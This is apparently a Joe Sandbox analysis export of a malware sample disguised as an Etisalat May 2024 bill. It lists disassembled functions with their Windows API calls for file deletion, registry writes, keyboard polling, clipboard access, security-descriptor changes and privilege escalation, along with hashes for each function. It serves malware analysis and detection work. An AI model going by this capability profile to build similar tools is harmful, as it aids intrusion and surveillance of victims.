                                      • FindClose.KERNEL32(00000000), ref: 00BCF29C
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00BCF2B8
                                      • _wcscmp.LIBCMT ref: 00BCF2DF
                                      • _wcscmp.LIBCMT ref: 00BCF2F6
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BCF308
                                      • SetCurrentDirectoryW.KERNEL32(00C1A5A0), ref: 00BCF326
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BCF330
                                      • FindClose.KERNEL32(00000000), ref: 00BCF33D
                                      • FindClose.KERNEL32(00000000), ref: 00BCF34F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 1658e19d427047c53acf518210d0ac0fa3eb226028a8be81f6f8d7d5ad17cff2
                                      • Instruction ID: 8a5e4e3c6b14a3aa7fdf5690823a9737a5c8568a56c7c6b726b27e679a89af02
                                      • Opcode Fuzzy Hash: 1658e19d427047c53acf518210d0ac0fa3eb226028a8be81f6f8d7d5ad17cff2
                                      • Instruction Fuzzy Hash: 27318E7650125A6ADB109BA4DC88FFE77EDDF49361F1041F9F910D70A0EB30DA458A68
                                      Function 00BE0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0BDE
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BEF910,00000000,?,00000000,?,?), ref: 00BE0C4C
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BE0C94
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BE0D1D
                                      • RegCloseKey.ADVAPI32(?), ref: 00BE103D
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE104A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 7cbe582e082c53f090622994699c998c0b3b53c9f05ba64133354452b0ef6094
                                      • Instruction ID: 44095d02a213ace898f7713fa57be16f1941db2c82153315215bf8285001ebbe
                                      • Opcode Fuzzy Hash: 7cbe582e082c53f090622994699c998c0b3b53c9f05ba64133354452b0ef6094
                                      • Instruction Fuzzy Hash: 510291752006419FCB14EF15C895E2AB7E5FF88714F1488ADF98A9B3A2CB74ED41CB81
                                      Function 00BCF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BCF37E
                                      • _wcscmp.LIBCMT ref: 00BCF393
                                      • _wcscmp.LIBCMT ref: 00BCF3AA
                                        • Part of subcall function 00BC45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BC45DC
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00BCF3D9
                                      • FindClose.KERNEL32(00000000), ref: 00BCF3E4
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00BCF400
                                      • _wcscmp.LIBCMT ref: 00BCF427
                                      • _wcscmp.LIBCMT ref: 00BCF43E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BCF450
                                      • SetCurrentDirectoryW.KERNEL32(00C1A5A0), ref: 00BCF46E
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BCF478
                                      • FindClose.KERNEL32(00000000), ref: 00BCF485
                                      • FindClose.KERNEL32(00000000), ref: 00BCF497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: 9f4ca7af9fc674b8044d164b2d986669a27b8800ec8d27d9fed4f29e0cfd1553
                                      • Instruction ID: 552f35937ce4d8b33800302ef0853ad9cb1aa0ff27cf5fc7f56205db73dc738b
                                      • Opcode Fuzzy Hash: 9f4ca7af9fc674b8044d164b2d986669a27b8800ec8d27d9fed4f29e0cfd1553
                                      • Instruction Fuzzy Hash: 0031937650125A6ACB14AB64EC88FFE77EEDF49360F1041F9E850E71A0DB70DE44CA64
                                      Function 00BB81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BB8766
                                        • Part of subcall function 00BB874A: GetLastError.KERNEL32(?,00BB822A,?,?,?), ref: 00BB8770
                                        • Part of subcall function 00BB874A: GetProcessHeap.KERNEL32(00000008,?,?,00BB822A,?,?,?), ref: 00BB877F
                                        • Part of subcall function 00BB874A: HeapAlloc.KERNEL32(00000000,?,00BB822A,?,?,?), ref: 00BB8786
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BB879D
                                        • Part of subcall function 00BB87E7: GetProcessHeap.KERNEL32(00000008,00BB8240,00000000,00000000,?,00BB8240,?), ref: 00BB87F3
                                        • Part of subcall function 00BB87E7: HeapAlloc.KERNEL32(00000000,?,00BB8240,?), ref: 00BB87FA
                                        • Part of subcall function 00BB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BB8240,?), ref: 00BB880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BB825B
                                      • _memset.LIBCMT ref: 00BB8270
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BB828F
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB82A0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00BB82DD
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BB82F9
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB8316
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BB8325
                                      • HeapAlloc.KERNEL32(00000000), ref: 00BB832C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BB834D
                                      • CopySid.ADVAPI32(00000000), ref: 00BB8354
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BB8385
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BB83AB
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BB83BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: fd9ff7b43dcfeacb1d23f25117f8e9d6dccc256c7a1c9cc7231f587d7ea711a2
                                      • Instruction ID: 6f10cc54c8200d4d02a9dbd050ca666436083674edf46e9e578edfe632e7a743
                                      • Opcode Fuzzy Hash: fd9ff7b43dcfeacb1d23f25117f8e9d6dccc256c7a1c9cc7231f587d7ea711a2
                                      • Instruction Fuzzy Hash: DD614B7190020AABDF009F94DC85AFEBBF9FF04700F1481A9F915AB291DBB59A05CF60
                                      Function 00B76843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                      • API String ID: 0-4052911093
                                      • Opcode ID: c202d37081179bc34be7548aebecf0b77f3e43b28dcb910f232912a3999d7115
                                      • Instruction ID: 87732065e5cdc63679d98672ce989751728b599ec2fa2b2e47de9caddad847e1
                                      • Opcode Fuzzy Hash: c202d37081179bc34be7548aebecf0b77f3e43b28dcb910f232912a3999d7115
                                      • Instruction Fuzzy Hash: C8727F71E006199BDB24CF59C8907FEB7F5EF48310F5485AAE959EB280EB709D81CB90
                                      Function 00BE0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0737
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BE07D6
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BE086E
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BE0AAD
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE0ABA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: a81475f22cb89046674601bf70dc5b49f1f374f045b5133aae33c38ec1095801
                                      • Instruction ID: db2b8061daf7592e405efa90dcb53fdd3ef57981560009c4b5d94e86b669b6b8
                                      • Opcode Fuzzy Hash: a81475f22cb89046674601bf70dc5b49f1f374f045b5133aae33c38ec1095801
                                      • Instruction Fuzzy Hash: 48E16E31204351AFCB14EF29C895E2ABBE8EF89714F0485ADF44ADB262DB30ED41CB51
                                      Function 00BC0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00BC0241
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00BC02C2
                                      • GetKeyState.USER32(000000A0), ref: 00BC02DD
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00BC02F7
                                      • GetKeyState.USER32(000000A1), ref: 00BC030C
                                      • GetAsyncKeyState.USER32(00000011), ref: 00BC0324
                                      • GetKeyState.USER32(00000011), ref: 00BC0336
                                      • GetAsyncKeyState.USER32(00000012), ref: 00BC034E
                                      • GetKeyState.USER32(00000012), ref: 00BC0360
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00BC0378
                                      • GetKeyState.USER32(0000005B), ref: 00BC038A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: fc31255cd0b94e52c113ddfa05f40c6ce7d4a38a9f04bdd2bc83943adf3e0613
                                      • Instruction ID: 84a9056a99478d0b79b620d401563d3e174774ee4e3ac04d5cf4768b637f3677
                                      • Opcode Fuzzy Hash: fc31255cd0b94e52c113ddfa05f40c6ce7d4a38a9f04bdd2bc83943adf3e0613
                                      • Instruction Fuzzy Hash: E241BC246147CAEEFF316BA48448BB5BEE0EF65340F0840DDD9C64B1C2DB9499C4D7A6
                                      Function 00BD86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • CoInitialize.OLE32 ref: 00BD8718
                                      • CoUninitialize.OLE32 ref: 00BD8723
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00BF2BEC,?), ref: 00BD8783
                                      • IIDFromString.OLE32(?,?), ref: 00BD87F6
                                      • VariantInit.OLEAUT32(?), ref: 00BD8890
                                      • VariantClear.OLEAUT32(?), ref: 00BD88F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 6e36b07929e93bc5475c1b28758b5caf015aedaf5e23411207d22f040f185c60
                                      • Instruction ID: f4cbd1c3005e8e622524efd95044d5e88feccb51de10e9e0630dd1880d45496a
                                      • Opcode Fuzzy Hash: 6e36b07929e93bc5475c1b28758b5caf015aedaf5e23411207d22f040f185c60
                                      • Instruction Fuzzy Hash: C0619B706083019FC710DF24C888B6AFBE8EF45715F10489AF9859B391EB70ED48DB92
                                      Function 00BD4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 9caa235ccbd3fa48daf417247abc39a990240e445d5277b0ef82d9d9d55f4b24
                                      • Instruction ID: fd5e4a6fb2766f55a2f797c85edbbc7e77b574811608cf3c07385ff76e5c3a0b
                                      • Opcode Fuzzy Hash: 9caa235ccbd3fa48daf417247abc39a990240e445d5277b0ef82d9d9d55f4b24
                                      • Instruction Fuzzy Hash: A9218B352002119FDB11AF60EC89B7AB7E8EF44710F1480AAF906DB3A1DF78AD01CB54
                                      Function 00BC3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                        • Part of subcall function 00BC4CD3: GetFileAttributesW.KERNEL32(?,00BC3947), ref: 00BC4CD4
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00BC3ADF
                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BC3B87
                                      • MoveFileW.KERNEL32(?,?), ref: 00BC3B9A
                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00BC3BB7
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BC3BD9
                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BC3BF5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 4002782344-1173974218
                                      • Opcode ID: 99bc4a76ca08b76af1d8faa3d0bce3909363b69bb4cb1c7bd4c4628bd54b3a5a
                                      • Instruction ID: dbad2686ed50249127587347c8b451ebf7e0793aad3535252e2cc14ba8b1b4f8
                                      • Opcode Fuzzy Hash: 99bc4a76ca08b76af1d8faa3d0bce3909363b69bb4cb1c7bd4c4628bd54b3a5a
                                      • Instruction Fuzzy Hash: 20514E318052499ACF15EBA0DD92EFDB7F9AF14704F6481E9E44277091DF256F09CBA0
                                      Function 00BCF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00BCF6AB
                                      • Sleep.KERNEL32(0000000A), ref: 00BCF6DB
                                      • _wcscmp.LIBCMT ref: 00BCF6EF
                                      • _wcscmp.LIBCMT ref: 00BCF70A
                                      • FindNextFileW.KERNEL32(?,?), ref: 00BCF7A8
                                      • FindClose.KERNEL32(00000000), ref: 00BCF7BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                      • String ID: *.*
                                      • API String ID: 713712311-438819550
                                      • Opcode ID: f843d5625b7476d819a2bb4f9739817aa749f3f1d637edb61f24be5794f3cac7
                                      • Instruction ID: a1ce8b54d1d94005c6709829fddfbf8d9c2b50d5407653f0e8795b9ac731249c
                                      • Opcode Fuzzy Hash: f843d5625b7476d819a2bb4f9739817aa749f3f1d637edb61f24be5794f3cac7
                                      • Instruction Fuzzy Hash: 4641387190020A9BDF15DF64CC85EEEBBF9EF05310F1445EAE815A72A1EB309E54CB90
                                      Function 00B74140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: 5032888dc4b65f862b24e8010d70458ff495f5099ef08d49a854e4f23b78fa62
                                      • Instruction ID: 38ca8dd2972ff162b7e2b14caae356b5183733f6823cb5a4204b59726e189c58
                                      • Opcode Fuzzy Hash: 5032888dc4b65f862b24e8010d70458ff495f5099ef08d49a854e4f23b78fa62
                                      • Instruction Fuzzy Hash: 58A27D70E0821ACBDF24CF58C9907ADB7F1FB55315F1481EAD96AA7680EB309E81CB51
                                      Function 00B758C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: f9804de1bda5e741233877cbf1a73e1939fe5f44c4953a3556feee95cd3d83c0
                                      • Instruction ID: a758c760b1c68dacd53263746e5a3eec2a22a90012dd86faf590b1559716299c
                                      • Opcode Fuzzy Hash: f9804de1bda5e741233877cbf1a73e1939fe5f44c4953a3556feee95cd3d83c0
                                      • Instruction Fuzzy Hash: 0A126970A00609DBDF14EFA4D981AFEB7F5FF48300F1086A9E45AA7251EB75AD11CB50
                                      Function 00BC545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BB8D0D
                                        • Part of subcall function 00BB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BB8D3A
                                        • Part of subcall function 00BB8CC3: GetLastError.KERNEL32 ref: 00BB8D47
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00BC549B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
